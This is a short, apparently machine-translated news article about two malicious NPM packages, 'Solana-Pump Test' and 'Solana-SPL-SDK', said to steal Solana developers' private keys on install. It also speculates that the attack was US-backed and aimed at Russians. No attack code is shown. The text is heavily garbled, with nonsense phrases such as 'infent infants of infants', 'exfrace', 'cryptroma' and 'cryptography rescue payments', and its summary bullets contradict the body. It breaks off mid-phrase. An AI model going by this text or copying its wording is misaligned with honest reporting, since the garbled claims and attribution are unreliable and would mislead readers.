- Researchers discover two packages that carry an infositor
- Victims are apparently Russian and American attackers
- This led the researchers to speculate if the objectives were Russian computer pirates
Recently, two malicious packages were discovered on the NPM Package Manager platform aimed at software developers in the Solana ecosystem.
However, the discovery, attribution and potential objectives of malware have made researchers speculate if it was an attack sponsored by the State.
Solana is a block chain designed for decentralized applications and cryptocurrencies. It is similar to Ethereum in many aspects, so it is often described in the cryptographic community as the “murderer of Ethereum”.
Aimed at developers? Or hackers? Or both?
Recently, security safety researchers found two NPM packages: “Solana-Pump Test” and “Solana-SPL-SDK”.
Both were sent by the same author, and both contained an identical code, and according to security, when these packages were installed, scripts executed that exfiled confidential information of compromised devices, including the private keys that gave the attackers access to cryptographic funds.
Security says that the victims, the developers who discharged and directed the infent infants of infants, were located in Russia.
The attackers, on the other hand, seem to be located in the United States, depending on the IP addresses where the exfiltrated data were transmitted.
These things were enough for researchers to ask if this was a threat actor backed by the United States aimed at Russia, probably due to geopolitical relations currently tense between the two powers.
But NPM, as a platform, is not Russian or is administered by the Russians. The NPM platform is directed by NPM, Inc., a company that was originally independent but that is now a Github subsidiary, which is owned by Microsoft.
Even so, Russia has multiple threat actors sponsored by the State and affiliates that are known to go to cryptocurrency users, or large companies that are then forced to make cryptography rescue payments. Groups such as EVIL CORP, Sandworm and APT28 (Fancy Bear) have been linked to campaigns that exfrace cryptocurrencies or implement ransomware for financial gains.
Therefore, it is not too crazy specular if this attack was aimed at cryptroma, as well as regular cryptography developers.
Through The registration
